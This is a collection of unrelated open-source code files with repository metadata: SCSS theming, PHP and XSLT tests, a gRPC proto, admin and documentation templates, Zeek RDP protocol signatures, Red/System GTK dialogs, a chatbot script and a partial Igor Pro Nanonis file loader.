JavaDefinitions '%% ArrayInitStmts [. JavaInitializations] NewRagelDef end function function main replace [program] P [program] export ArrayInits [java_statements] _ by P [langTransJava] end function
TXL
4
garethchen/hhvm-third-party
ragel/src/test/langtrans_java.txl
[ "MIT" ]
<style> .table td { text-align: left; } .table td:first-child { text-align: right; width: 230px; }​ </style> This document is a detailed and (hopefully) complete reference of the public interface of `rpclib`. For a tutorial, take a look at the [Primer](primer.md). Also, you can find many examples in the [Cookbook](cookbook.md). <%! def opt(s): if s != None: return s else: return '' %> % for c in classes: ${"##"} ${c.name} ```cpp ${"#include "}"${c.includes}" ``` ${"### Description"} ${c.brief} ${opt(c.desc)} ${"### Public functions"} | | | |---------|-------------| % for f in c.functions: | ${opt(f.type)} | [${f.name}](${"#"}${f.id})${f.argsstr} % endfor % for f in c.functions: ${"#### "}${c.name}::${f.name} ```cpp ${opt(f.type)} ${c.name}::${f.name}${f.argsstr}; ``` ${f.brief} % if f.tparams: ${"##### Template parameters"} % for t in f.tparams: `${t.name}` ${t.desc} % endfor % endif % if f.params: ${"##### Parameters"} % for p in f.params: `${p.name}` ${p.desc} % endfor % endif % if f.desc: ${"##### Details"} ${f.desc} % endif % if f.returns: ${"##### Return value"} ${f.returns} % endif % if f.note: !!! warn ${f.note} % endif % endfor % endfor
Mako
4
LeHuman/rpclib
doc/reference.md.mako
[ "MIT" ]
@use 'sass:map'; @use '../core/style/private'; @use '../core/theming/theming'; @mixin color($config-or-theme) { $config: theming.get-color-config($config-or-theme); $foreground: map.get($config, foreground); $background: map.get($config, background); .mat-autocomplete-panel { @include private.private-theme-overridable-elevation(4, $config); background: theming.get-color-from-palette($background, card); color: theming.get-color-from-palette($foreground, text); // Selected options in autocompletes should not be gray, but we // only want to override the background for selected options if // they are *not* in hover or focus state. This change has to be // made here because base option styles are shared between the // autocomplete and the select. .mat-option.mat-selected:not(.mat-active):not(:hover) { background: theming.get-color-from-palette($background, card); &:not(.mat-option-disabled) { color: theming.get-color-from-palette($foreground, text); } } } } @mixin typography($config-or-theme) {} @mixin _density($config-or-theme) {} @mixin theme($theme-or-color-config) { $theme: theming.private-legacy-get-theme($theme-or-color-config); @include theming.private-check-duplicate-theme-styles($theme, 'mat-autocomplete') { $color: theming.get-color-config($theme); $density: theming.get-density-config($theme); $typography: theming.get-typography-config($theme); @if $color != null { @include color($color); } @if $density != null { @include _density($density); } @if $typography != null { @include typography($typography); } } }
SCSS
5
RAM-16/gdscaec-Angular
node_modules/@angular/material/autocomplete/_autocomplete-theme.scss
[ "MIT" ]
--TEST-- pcntl_setpriority() - Basic behaviour --CREDITS-- Er Galvão Abbott [email protected] # TestFest 2017 PHPRS PHP UG 2017-10-31 --EXTENSIONS-- pcntl --SKIPIF-- <?php if (!function_exists('pcntl_setpriority')) { die('skip pcntl_setpriority doesn\'t exist'); } if (@pcntl_setpriority(-5) === false && pcntl_get_last_error() == PCNTL_EACCES) { die('skip this function needs to run with CAP_SYS_NICE privileges'); } ?> --FILE-- <?php var_dump(pcntl_setpriority(-5)); ?> --EXPECT-- bool(true)
PHP
4
NathanFreeman/php-src
ext/pcntl/tests/pcntl_setpriority_basic.phpt
[ "PHP-3.01" ]
syntax = "proto3"; import "orders/message.proto"; package proto_example.orders; service OrderService { rpc Find(Order) returns (Order); rpc Sync(stream Order) returns (stream Order); rpc SyncCall(stream Order) returns (stream Order); rpc StreamReq(stream Order) returns (Order); rpc StreamReqCall(stream Order) returns (Order); }
Protocol Buffer
3
SuperHuangXu/nest
integration/microservices/src/grpc-advanced/proto/orders/service.proto
[ "MIT" ]
<?xml version='1.0' encoding='UTF-8'?> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:py="http://purl.org/kid/ns#" py:extends="'library.kid'"> <?python # # Copyright (c) SAS Institute Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ?> <!-- table of permissions --> <table class="user-admin" id="permissions" py:def="permTable(role, rows)"> <thead> <tr> <td style="width: 55%;">Label</td> <td>Trove</td> <td>Write</td> <td>Remove</td> <td>X</td> <td>E</td> </tr> </thead> <tbody> <tr py:for="i, row in rows" class="${i % 2 and 'even' or 'odd'}"> <td py:content="row[0]"/> <td py:content="row[1]"/> <td py:content="row[2] and 'yes' or 'no'"/> <td py:content="row[3] and 'yes' or 'no'"/> <td><a href="deletePerm?role=${role};label=${row[0]}&amp;item=${row[1]}" title="Delete Permission">X</a></td> <td><a href="editPermForm?role=${role};label=${row[0]};trove=${row[1]};writeperm=${row[2]};remove=${row[3]}" title="Edit Permission">E</a></td> </tr> <tr py:if="not rows"> <td>Role has no permissions.</td> </tr> </tbody> </table> <head/> <body> <div id="inner"> <h2>Users</h2> <table class="user-admin" id="users"> <thead> <tr> <td style="width: 25%;">Username</td> <td>Member Of</td> <td style="text-align: right;">Action</td> </tr> </thead> <tbody> <tr py:for="i, user in enumerate(netAuth.userAuth.getUserList())" class="${i % 2 and 'even' or 'odd'}"> <td>${user}</td> <td><div py:for="role in netAuth.userAuth.getRolesByUser(user)" py:content="role" /> </td> <td style="text-align: right;"><a href="chPassForm?username=${user}">Change Password</a>&nbsp;|&nbsp;<a href="deleteUser?username=${user}">Delete</a></td> </tr> </tbody> </table> <p><a href="addUserForm">Add User</a></p> <h2>Roles</h2> <table class="user-admin" id="roles"> <thead><tr><td style="width: 25%;">Role</td><td>Admin</td><td>Mirror</td><td>Permissions</td><td style="text-align: right;">Action</td></tr></thead> <tbody> <tr py:for="i, role in enumerate(netAuth.getRoleList())" class="${i % 2 and 'even' or 'odd'}"> <?python # rows = list(enumerate(netAuth.iterPermsByRole(role))) ta = ri.listTroveAccess(role) filt = netAuth.getRoleFilters([role])[role] ?> <td><b>${role}</b></td> <td py:if="netAuth.roleIsAdmin(role)" py:content="'yes'"/> <td py:if="not netAuth.roleIsAdmin(role)" py:content="'no'"/> <td py:if="netAuth.roleCanMirror(role)" py:content="'yes'"/> <td py:if="not netAuth.roleCanMirror(role)" py:content="'no'"/> <td> <div py:if="rows" py:content="permTable(role, rows)"/> <span py:if="not rows" style="font-size: 80%;">Role has no permissions</span> <div py:if="ta" style="font-size: 80%;">Role has trove access entries</div> <div py:if="not (filt[0].isEmpty() and filt[1].isEmpty())" style="font-size: 80%;">Role has filter flags</div> </td> <td style="text-align: right;"><a href="addPermForm?roleName=${role}">Add&nbsp;Permission</a>&nbsp;|&nbsp;<a href="deleteRole?roleName=${role}">Delete&nbsp;Role</a>&nbsp;|&nbsp;<a href="manageRoleForm?roleName=${role}">Edit&nbsp;Role</a></td> </tr> </tbody> </table> <p> <a href="addRoleForm">Add Role</a> </p> </div> </body> </html>
Genshi
4
sassoftware/conary
conary/server/templates/user_admin.kid
[ "Apache-2.0" ]
<script type="module" src="./index.js"></script> <div class="app">vite cli in "type":"module" package works!</div>
HTML
1
laineus/vite
packages/playground/cli-module/index.html
[ "MIT" ]
{ "device_automation": { "trigger_type": { "fingerprint": "otrzymano kod odcisku palca", "send_keys": "otrzymano klucze wysy\u0142ania", "transmitter": "otrzymano kod nadajnika", "transponder": "otrzymano kod transpondera" } } }
JSON
3
MrDelik/core
homeassistant/components/lcn/translations/pl.json
[ "Apache-2.0" ]
signature dpd_rdp_client { ip-proto == tcp # Client request payload /.*(Cookie: mstshash\=|Duca.*(rdpdr|rdpsnd|drdynvc|cliprdr))/ requires-reverse-signature dpd_rdp_server enable "rdp" } signature dpd_rdp_server { ip-proto == tcp payload /(.{5}\xd0|.*McDn)/ } signature dpd_rdpeudp_syn { ip-proto == udp payload-size <= 1232 payload-size >= 1132 payload /^\xff{4}.{2}.{1}\x01/ enable "rdpeudp" }
Standard ML
4
yaplej/bro
scripts/base/protocols/rdp/dpd.sig
[ "Apache-2.0" ]
Red/System [ Title: "Common Dialogs" Author: "Xie Qingtian, RCqls" File: %comdlgs.reds Tabs: 4 Rights: "Copyright (C) 2016 Xie Qingtian. All rights reserved." License: { Distributed under the Boost Software License, Version 1.0. See https://github.com/red/red/blob/master/BSL-License.txt } ] request-file-double-clicked: func [ [cdecl] widget [handle!] ctx [node!] ][ gtk_dialog_response widget GTK_RESPONSE_ACCEPT ] _request-file: func [ title [red-string!] path [red-file!] filter [red-block!] save? [logic!] multi? [logic!] dir? [logic!] return: [red-value!] /local len n [integer!] buf [c-string!] widget [handle!] window [handle!] new? [logic!] resp [integer!] cstr [c-string!] size [integer!] str [red-string!] ret [red-value!] pattern [handle!] s [series!] start [red-string!] end [red-string!] strarr [int-ptr!] action [integer!] ][ len: -1 buf: "Open File" either TYPE_OF(title) = TYPE_STRING [ buf: unicode/to-utf8 title :len ][ if dir? [buf: "Open Folder"] ] ret: as red-value! none-value action: GTK_FILE_CHOOSER_ACTION_OPEN if dir? [action: GTK_FILE_CHOOSER_ACTION_SELECT_FOLDER] widget: gtk_file_chooser_dialog_new [ buf null action "Cancel" GTK_RESPONSE_CANCEL "Open" GTK_RESPONSE_ACCEPT null ] if any [ TYPE_OF(path) = TYPE_FILE TYPE_OF(path) = TYPE_STRING ][ buf: file/to-OS-path path either dir? [ gtk_file_chooser_set_current_folder widget buf ][ gtk_file_chooser_set_filename widget buf ] ] if TYPE_OF(filter) = TYPE_BLOCK [ s: GET_BUFFER(filter) start: as red-string! s/offset + filter/head end: as red-string! s/tail while [start + 1 < end][ str: start + 1 ;-- filter pattern if any [ TYPE_OF(start) <> TYPE_STRING all [TYPE_OF(str) <> TYPE_STRING TYPE_OF(str) <> TYPE_FILE] ][ fire [TO_ERROR(script invalid-arg) filter] ] pattern: gtk_file_filter_new len: -1 buf: unicode/to-utf8 start :len ;-- filter name if len > 0 [gtk_file_filter_set_name pattern buf] len: -1 buf: unicode/to-utf8 str :len if len > 0 [ strarr: g_strsplit buf ";" -1 n: 1 while [strarr/n <> 0][ gtk_file_filter_add_pattern pattern as c-string! strarr/n n: n + 1 ] g_strfreev strarr gtk_file_chooser_add_filter widget pattern ] start: start + 2 ] ] gobj_signal_connect(widget "file-activated" :request-file-double-clicked null) window: find-active-window new?: false if null? window [ window: gtk_window_new 0 gtk_widget_hide window new?: true ] gtk_window_set_transient_for widget window resp: gtk_dialog_run widget if resp = GTK_RESPONSE_ACCEPT [ cstr: gtk_file_chooser_get_filename widget size: length? cstr str: string/load cstr size UTF-8 if dir? [string/append-char GET_BUFFER(str) as-integer #"/"] ret: as red-value! str set-type ret TYPE_FILE ] gtk_widget_destroy widget if new? [ gtk_widget_destroy window ] ret ] OS-request-dir: func [ title [red-string!] dir [red-file!] filter [red-block!] keep? [logic!] multi? [logic!] return: [red-value!] ][ _request-file title dir filter keep? multi? yes ] OS-request-file: func [ title [red-string!] name [red-file!] filter [red-block!] save? [logic!] multi? [logic!] return: [red-value!] ][ _request-file title name filter save? multi? no ] OS-request-font: func [ font [red-object!] selected [red-object!] mono? [logic!] return: [red-object!] /local widget [handle!] window [handle!] new? [logic!] fd [handle!] resp [integer!] cstr [c-string!] size [integer!] values [red-value!] str [red-string!] style [red-block!] bold? [logic!] ][ widget: gtk_font_chooser_dialog_new "Font" null if TYPE_OF(selected) = TYPE_OBJECT [ fd: create-pango-font selected gtk_font_chooser_set_font_desc widget fd free-pango-font fd ] window: find-active-window new?: false if null? window [ window: gtk_window_new 0 gtk_widget_hide window new?: true ] gtk_window_set_transient_for widget window resp: gtk_dialog_run widget either resp = -5 [ fd: gtk_font_chooser_get_font_desc widget cstr: pango_font_description_get_family fd size: length? cstr values: object/get-values font str: string/make-at values + FONT_OBJ_NAME size Latin1 unicode/load-utf8-stream cstr size str null size: pango_font_description_get_size fd integer/make-at values + FONT_OBJ_SIZE size / PANGO_SCALE style: as red-block! values + FONT_OBJ_STYLE bold?: no if PANGO_WEIGHT_NORMAL < pango_font_description_get_weight fd [ word/make-at _bold as red-value! style bold?: yes ] if PANGO_STYLE_ITALIC = pango_font_description_get_style fd [ either bold? [ block/make-at style 4 word/push-in _bold style word/push-in _italic style ][ word/make-at _italic as red-value! style ] ] ][ font/header: TYPE_NONE ] gtk_widget_destroy widget if new? [ gtk_widget_destroy window ] ; This trick really matters to end the loop when in the red-console while [gtk_events_pending][gtk_main_iteration] font ]
Red
4
GalenIvanov/red
modules/view/backends/gtk3/comdlgs.reds
[ "BSL-1.0", "BSD-3-Clause" ]
// Scripts can be used to give programmatic responses to patterns, or process state machines. state Corrections { // pattern "(can) (you) tell me who * is" template redirect(Template("who is {star}")); // pattern "do you know who * is" template redirect(Template("who is {star}")); // pattern "tell me who * is" template redirect(Template("who is {star}")); // // pattern "what do you [think know] [about of] *" template redirect(Template("what is {star}")); // pattern "I [want would] (like) to know (something anything everything) (about) *" template redirect(Template("what is {star}")); // pattern "(can) (you) tell me what * is" template redirect(Template("what is {star}")); // pattern "(what) (can) (you) tell me (something anything everything) about *" template redirect(Template("what is {star}")); // pattern "do you know what * is" template redirect(Template("what is {star}")); // pattern "do you know (something anything everything) about *" template redirect(Template("what is {star}")); // pattern "* is what" template redirect(Template("what is {star}")); // pattern "what does * mean" template redirect(Template("what is {star}")); // pattern "what does it mean to be *" template redirect(Template("what is {star}")); // // pattern "do you [know think remember] (that) *" template redirect(Template("{star}?")); // pattern "remember (that) *" template redirect(star); // pattern "please *" template redirect(star); // pattern "pls *" template redirect(star); // // pattern "where in the world is *" template redirect(Template("where is {star}")); pattern "*--*" template redirect(Template("{star[0]}-{star[1]}")); pattern "*чатбот*" template redirect(Template("{star[0]}чат-бот{star[1]}")); pattern "*чатбота*" template redirect(Template("{star[0]}чат-бота{star[1]}")); pattern "*чатботу*" template redirect(Template("{star[0]}чат-боту{star[1]}")); pattern "*чатботом*" template redirect(Template("{star[0]}чат-ботом{star[1]}")); pattern "*чатботе*" template redirect(Template("{star[0]}чат-боте{star[1]}")); pattern "*чатботы*" template redirect(Template("{star[0]}чат-боты{star[1]}")); pattern "*чатботов*" template redirect(Template("{star[0]}чат-ботов{star[1]}")); pattern "*чатботам*" template redirect(Template("{star[0]}чат-ботам{star[1]}")); pattern "*чатботами*" template redirect(Template("{star[0]}чат-ботами{star[1]}")); pattern "*чатботах*" template redirect(Template("{star[0]}чат-ботах{star[1]}")); pattern "*может быть*" template redirect(Template("{star[0]}{star[1]}")); pattern "*наверное*" template redirect(Template("{star[0]}{star[1]}")); pattern "*я (так) думаю*" template redirect(Template("{star[0]}{star[1]}")); pattern "*я хочу (чтобы)*" template redirect(Template("{star[0]}{star[1]}")); pattern "*ты*" template redirect(Template("{star[0]}{star[1]}")); pattern "*тебя*" template redirect(Template("{star[0]}{star[1]}")); pattern "*твое*" template redirect(Template("{star[0]}{star[1]}")); pattern "*твоё*" template redirect(Template("{star[0]}{star[1]}")); pattern "*своими*" template redirect(Template("{star[0]}{star[1]}")); pattern "*скажи*" template redirect(Template("{star[0]}{star[1]}")); pattern "*сказать*" template redirect(Template("{star[0]}{star[1]}")); pattern "*ответь*" template redirect(Template("{star[0]}{star[1]}")); pattern "*ответить*" template redirect(Template("{star[0]}{star[1]}")); pattern "*расскажи*" template redirect(Template("{star[0]}{star[1]}")); pattern "*рассказать*" template redirect(Template("{star[0]}{star[1]}")); pattern "*напиши*" template redirect(Template("{star[0]}{star[1]}")); pattern "*написать*" template redirect(Template("{star[0]}{star[1]}")); pattern "*кто такой*" template redirect(Template("{star[0]}кто{star[1]}")); pattern "*ghbdtn*" template redirect(Template("{star[0]}привет{star[1]}")); pattern "*прива*" template redirect(Template("{star[0]}привет{star[1]}")); pattern "*пвет*" template redirect(Template("{star[0]}привет{star[1]}")); pattern "*приветт*" template redirect(Template("{star[0]}привет{star[1]}")); }
Self
3
Endurance-Robotics/ChatBots
botabout/botlibre/scripts/Corrections.self
[ "MIT" ]
<?xml version='1.0'?> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" xsl:extension-element-prefixes="php" version='1.0'> <xsl:template match="/"> <xsl:value-of select="php:functionString('foobar', /doc/@id, 'secondArg')"/> <xsl:text> </xsl:text> <xsl:value-of select="php:function('foobar', /doc/@id)"/> <xsl:text> </xsl:text> <xsl:value-of select="php:function('nodeSet')"/> <xsl:text> </xsl:text> <xsl:value-of select="php:function('nodeSet',/doc)/i"/> <xsl:text> </xsl:text> <xsl:value-of select="php:function('aClass::aStaticFunction','static')"/> <xsl:text> </xsl:text> <xsl:value-of select="php:function('nonDomNode')"/> </xsl:template> </xsl:stylesheet>
XSLT
3
donsbot/hhvm
hphp/test/zend/good/ext/xsl/tests/xslt011.xsl
[ "PHP-3.01", "Zend-2.0" ]
<?xml version='1.0' encoding='utf-8'?> <?python import time ?> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:py="http://purl.org/kid/ns#"> <div py:def="contents()"> <p py:for="e in entries"> ${time.strftime('%a %d %b, %H:%M:%S', e.date)}: <a href="${blogroot}/${`e.year`}/${`e.month`}/${`e.day`}/${`e.subject`}.xhtml">${e.subject}</a> </p> </div> </html>
Genshi
3
decklin/ennepe
examples/simple/style/esummary.kid
[ "0BSD" ]
#pragma TextEncoding="UTF-8" #pragma rtGlobals=3 #pragma ModuleName=LoadNanonis3ds #ifndef SIDAMshowProc #pragma hide = 1 #endif // Main function Function/WAVE LoadNanonis3ds(String pathStr) DFREF dfrSav = GetDataFolderDFR() // Read the header NewDataFolder/O/S $SIDAM_DF_SETTINGS STRUCT Nanonis3ds s LoadNanonis3dsGetHeader(pathStr, s) // Read the data SetDataFolder dfrSav Wave/WAVE resw = LoadNanonis3dsGetData(pathStr, s) return resw End // Read the header // // The values read from the header are saved as global variables // in the current datafolder. // Information necessary for the data reading function is saved to // the structure "s". Static Function LoadNanonis3dsGetHeader(String pathStr, STRUCT Nanonis3ds &s) // Save the header values as global variables s.headerSize = LoadNanonisCommonGetHeader(pathStr) Wave/Z s.mlsw = 'multiline settings' s.filename = ParseFilePath(3, pathStr, ":", 0, 0) // filename w/o an extension // Keep the header values in the structure for the data loading function. // NumVarOrDefault and StrVarOrDefault are used because NVAR and SVAR // do not have to be used. (NaN is not expected.) SVAR gridDim = $SIDAMNumStrName("Grid dim", 1) s.pnts.x = str2num(StringFromList(0, gridDim, " ")) s.pnts.y = str2num(StringFromList(2, gridDim, " ")) SVAR gridSettings = $SIDAMNumStrName("Grid settings", 1) s.center.x = str2num(StringFromList(0,gridSettings)) s.center.y = str2num(StringFromList(1,gridSettings)) s.size.x = str2num(StringFromList(2,gridSettings)) s.size.y = str2num(StringFromList(3,gridSettings)) s.angle = str2num(StringFromList(4,gridSettings)) s.type = SIDAMStrVarOrDefault("Filetype", "") s.signal = SIDAMStrVarOrDefault("Sweep Signal", "") s.paramList = SIDAMStrVarOrDefault("Fixed parameters", "") + ";" \ + SIDAMStrVarOrDefault("Experiment parameters", "") s.numParam = SIDAMNumVarOrDefault("# Parameters (4 byte)", NaN) s.expSize = SIDAMNumVarOrDefault("Experiment size (bytes)", NaN) s.pnts.z = SIDAMNumVarOrDefault("Points", NaN) s.channels = SIDAMStrVarOrDefault("Channels", "") s.delay = SIDAMNumVarOrDefault("Delay before measuring (s)", NaN) s.exp = SIDAMStrVarOrDefault("Experiment", "") Variable dd, mm, yyyy, hour, minite, second SVAR/Z startTime = $SIDAMNumStrName("Start time", 1) if (SVAR_Exists(startTime)) sscanf startTime, "%d.%d.%d %d:%d:%d", dd, mm, yyyy, hour, minite, second s.start = date2secs(yyyy,mm,dd) + hour*3600 + minite*60 + second endif SVAR/Z endTime = $SIDAMNumStrName("End time", 1) if (SVAR_Exists(endTime)) sscanf endTime, "%d.%d.%d %d:%d:%d", dd, mm, yyyy, hour, minite, second s.end = date2secs(yyyy,mm,dd) + hour*3600 + minite*60 + second endif s.user = SIDAMStrVarOrDefault("User", "") s.temperature = SIDAMNumVarOrDefault("Temperature", NaN) s.field = SIDAMNumVarOrDefault("Field", NaN) s.comment = SIDAMStrVarOrDefault("Comment", "") LoadNanonis3dsGetHeaderBias(s) LoadNanonis3dsGetHeaderBiasSpec(s) LoadNanonis3dsGetHeaderCurrent(s) LoadNanonis3dsGetHeaderLockin(s) LoadNanonis3dsGetHeaderMain(s) LoadNanonis3dsGetHeaderPiezo(s) LoadNanonis3dsGetHeaderScan(s) LoadNanonis3dsGetHeaderZCtrl(s) End Static Function LoadNanonis3dsGetHeaderBias(STRUCT Nanonis3ds &s) s.bias.value = SIDAMNumVarOrDefault(":Bias:'Bias (V)'", NaN) s.bias.calibration = SIDAMNumVarOrDefault(":Bias:'Calibration (V/V)'", NaN) s.bias.offset = SIDAMNumVarOrDefault(":Bias:'Offset (V)'", NaN) End Static Function LoadNanonis3dsGetHeaderBiasSpec(STRUCT Nanonis3ds &s) s.spec.start = SIDAMNumVarOrDefault(":'Bias Spectroscopy':'Sweep Start (V)'", NaN) s.spec.end = SIDAMNumVarOrDefault(":'Bias Spectroscopy':'Sweep End (V)'", NaN) s.spec.zpnts = SIDAMNumVarOrDefault(":'Bias Spectroscopy':'Num Pixel'", NaN) s.spec.zavg = SIDAMNumVarOrDefault(":'Bias Spectroscopy':'Z Avg time (s)'", NaN) s.spec.zoffset = SIDAMNumVarOrDefault(":'Bias Spectroscopy':'Z offset (m)'", NaN) s.spec.initdelay = SIDAMNumVarOrDefault(":'Bias Spectroscopy':'1st Settling time (s)'", NaN) s.spec.sampledelay = SIDAMNumVarOrDefault(":'Bias Spectroscopy':'Settling time (s)'", NaN) s.spec.integ = SIDAMNumVarOrDefault(":'Bias Spectroscopy':'Integration time (s)'", NaN) s.spec.enddelay = SIDAMNumVarOrDefault(":'Bias Spectroscopy':'End Settling time (s)'", NaN) s.spec.rate = SIDAMNumVarOrDefault(":'Bias Spectroscopy':'Max Slew rate (V/s)'", NaN) s.spec.zctrl = SIDAMNumVarOrDefault(":'Bias Spectroscopy':'Z control time (s)'", NaN) s.spec.backward = SIDAMStrVarOrDefault(":'Bias Spectroscopy':'backward sweep'", "") s.spec.hold = SIDAMStrVarOrDefault(":'Bias Spectroscopy':'Z-controller hold'", "") s.spec.sweeps = SIDAMNumVarOrDefault(":'Bias Spectroscopy':'Number of sweeps'", NaN) s.spec.channels = SIDAMStrVarOrDefault(":'Bias Spectroscopy':Channels", "") s.spec.resetbias = SIDAMStrVarOrDefault(":'Bias Spectroscopy':'Reset Bias'", "") s.spec.finalz = SIDAMStrVarOrDefault(":'Bias Spectroscopy':'Record final Z'", "") s.spec.lockin = SIDAMStrVarOrDefault(":'Bias Spectroscopy':'Lock-In run'", "") s.spec.mode = SIDAMStrVarOrDefault(":'Bias Spectroscopy':'Sweep mode'", "") End Static Function LoadNanonis3dsGetHeaderCurrent(STRUCT Nanonis3ds &s) s.current.value = SIDAMNumVarOrDefault(":Current:'Current (A)'", NaN) s.current.calibration = SIDAMNumVarOrDefault(":Current:'Calibration (A/V)'", NaN) s.current.offset = SIDAMNumVarOrDefault(":Current:'Offset (A)'", NaN) End Static Function LoadNanonis3dsGetHeaderLockin(STRUCT Nanonis3ds &s) s.lockin.status = SIDAMStrVarOrDefault(":'Lock-in':'Lock-in status'", "") s.lockin.modulated = SIDAMStrVarOrDefault(":'Lock-in':'Modulated signal'", "") s.lockin.freq = SIDAMNumVarOrDefault(":'Lock-in':'Frequency (Hz)'", NaN) s.lockin.amp = SIDAMNumVarOrDefault(":'Lock-in':Amplitude", NaN) s.lockin.signal = SIDAMStrVarOrDefault(":'Lock-in':'Demodulated signal'", "") s.lockin.harmonic = SIDAMNumVarOrDefault(":'Lock-in':Harmonic", NaN) s.lockin.phase = SIDAMNumVarOrDefault(":'Lock-in':'Reference phase (deg)'", NaN) End Static Function LoadNanonis3dsGetHeaderMain(STRUCT Nanonis3ds &s) s.main.path = SIDAMStrVarOrDefault(":NanonisMain:'Session Path'", "") s.main.version = SIDAMStrVarOrDefault(":NanonisMain:'SW Version'", "") s.main.ui = SIDAMNumVarOrDefault(":NanonisMain:'UI Release'", NaN) s.main.rt = SIDAMNumVarOrDefault(":NanonisMain:'RT Release'", NaN) s.main.freq = SIDAMNumVarOrDefault(":NanonisMain:'RT Frequency (Hz)'", NaN) s.main.oversampling = SIDAMNumVarOrDefault(":NanonisMain:'Signals Oversampling'", NaN) s.main.animations = SIDAMNumVarOrDefault(":NanonisMain:'Animations Period (s)'", NaN) s.main.indicators = SIDAMNumVarOrDefault(":NanonisMain:'Indicators Period (s)'", NaN) s.main.measurements = SIDAMNumVarOrDefault(":NanonisMain:'Measurements Period (s)'", NaN) End Static Function LoadNanonis3dsGetHeaderPiezo(STRUCT Nanonis3ds &s) s.piezo.active = SIDAMStrVarOrDefault(":'Piezo Calibration':'Active Calib.'", "") s.piezo.piezo.x = SIDAMNumVarOrDefault(":'Piezo Calibration':'Calib. X (m/V)'", NaN) s.piezo.piezo.y = SIDAMNumVarOrDefault(":'Piezo Calibration':'Calib. Y (m/V)'", NaN) s.piezo.piezo.z = SIDAMNumVarOrDefault(":'Piezo Calibration':'Calib. Z (m/V)'", NaN) s.piezo.gain.x = SIDAMNumVarOrDefault(":'Piezo Calibration':'HV Gain X'", NaN) s.piezo.gain.y = SIDAMNumVarOrDefault(":'Piezo Calibration':'HV Gain Y'", NaN) s.piezo.gain.z = SIDAMNumVarOrDefault(":'Piezo Calibration':'HV Gain Z'", NaN) s.piezo.tilt.x = SIDAMNumVarOrDefault(":'Piezo Calibration':'Tilt X (deg)'", NaN) s.piezo.tilt.y = SIDAMNumVarOrDefault(":'Piezo Calibration':'Tilt Y (deg)'", NaN) s.piezo.curvature.x = SIDAMNumVarOrDefault(":'Piezo Calibration':'Curvature radius X (m)'", NaN) s.piezo.curvature.y = SIDAMNumVarOrDefault(":'Piezo Calibration':'Curvature radius Y (m)'", NaN) s.piezo.correction.x = SIDAMNumVarOrDefault(":'Piezo Calibration':'2nd order corr X (V/m^2)'", NaN) s.piezo.correction.y = SIDAMNumVarOrDefault(":'Piezo Calibration':'2nd order corr Y (V/m^2)'", NaN) s.piezo.drift.x = SIDAMNumVarOrDefault(":'Piezo Calibration':'Drift X (m/s)'", NaN) s.piezo.drift.y = SIDAMNumVarOrDefault(":'Piezo Calibration':'Drift Y (m/s)'", NaN) s.piezo.drift.z = SIDAMNumVarOrDefault(":'Piezo Calibration':'Drift Z (m/s)'", NaN) s.piezo.status = SIDAMStrVarOrDefault(":'Piezo Calibration':'Drift correction status (on/off'", "") End Static Function LoadNanonis3dsGetHeaderScan(STRUCT Nanonis3ds &s) String str = SIDAMStrVarOrDefault(":scan:Scanfield","") s.scan.center.x = strlen(str) ? str2num(StringFromList(0, str)) : NaN s.scan.center.y = strlen(str) ? str2num(StringFromList(1, str)) : NaN s.scan.size.x = strlen(str) ? str2num(StringFromList(2, str)) : NaN s.scan.size.y = strlen(str) ? str2num(StringFromList(3, str)) : NaN s.scan.angle = strlen(str) ? str2num(StringFromList(4, str)) : NaN s.scan.name = SIDAMStrVarOrDefault(":scan:'series name'", "") s.scan.channels = SIDAMStrVarOrDefault(":scan:channels", "") s.scan.pnts.x = SIDAMNumVarOrDefault(":scan:'pixels/line'", NaN) s.scan.pnts.y = SIDAMNumVarOrDefault(":scan:lines", NaN) s.scan.forward = SIDAMNumVarOrDefault(":scan:'speed forw. (m/s)'", NaN) s.scan.backward = SIDAMNumVarOrDefault(":scan:'speed backw. (m/s)'", NaN) End Static Function LoadNanonis3dsGetHeaderZCtrl(STRUCT Nanonis3ds &s) s.zctrl.z = SIDAMNumVarOrDefault(":'Z-Controller':'Z (m)'", NaN) s.zctrl.name = SIDAMStrVarOrDefault(":'Z-Controller':'Controller name'", "") s.zctrl.status = SIDAMStrVarOrDefault(":'Z-Controller':'Controller status'", "") s.zctrl.setpoint = SIDAMNumVarOrDefault(":'Z-Controller':Setpoint", NaN) s.zctrl.unit = SIDAMStrVarOrDefault(":'Z-Controller':'Setpoint unit'", "") s.zctrl.p = SIDAMNumVarOrDefault(":'Z-Controller':'P gain'", NaN) s.zctrl.i = SIDAMNumVarOrDefault(":'Z-Controller':'I gain'", NaN) s.zctrl.tconst = SIDAMNumVarOrDefault(":'Z-Controller':'Time const (s)'", NaN) s.zctrl.lift = SIDAMNumVarOrDefault(":'Z-Controller':'TipLift (m)'", NaN) s.zctrl.delay = SIDAMNumVarOrDefault(":'Z-Controller':'Switch off delay (s)'", NaN) End Structure Nanonis3ds STRUCT ixyz pnts // Grid dim, Points STRUCT vxy center, size // Grid settings Variable angle // Grid settings String type // Filetype String signal // Sweep signal String paramList // Fixed parameters + ";" + Experiment parameters uint16 numParam // # Parameters (4 byte) uint16 expSize // Experiment size (bytes) String channels // Channels Variable delay // Delay before measuring (s) String exp // Experiment uint32 start, end // Start time, End time String user // User Variable temperature // Temperature (extension), NaN if not used. Variable field // Field (extension), NaN if not used. String comment // Comment STRUCT Nanonis3dsSetpoint bias STRUCT Nanonis3dsBiasSpectrscopy spec STRUCT Nanonis3dsSetpoint current STRUCT Nanonis3dsLockin lockin STRUCT Nanonis3dsMain main STRUCT Nanonis3dsPiezo piezo STRUCT Nanonis3dsScan scan STRUCT Nanonis3dsZCtrl zctrl Wave mlsw // Voltages in the MLS mode uint16 headerSize // Header size String filename // for log EndStructure Static Structure Nanonis3dsSetpoint Variable value // Bias (V), Current (A) Variable calibration // calibration (V/V) Variable offset // Offset (V) Variable gain // Gain EndStructure Static Structure Nanonis3dsBiasSpectrscopy Variable start, end // Sweep Start (V), Sweep End (V) uint16 zpnts // Num Pixels Variable zavg // Z Avg time (s) Variable zoffset // Z offset (m) Variable initdelay // 1st Settling time (s) 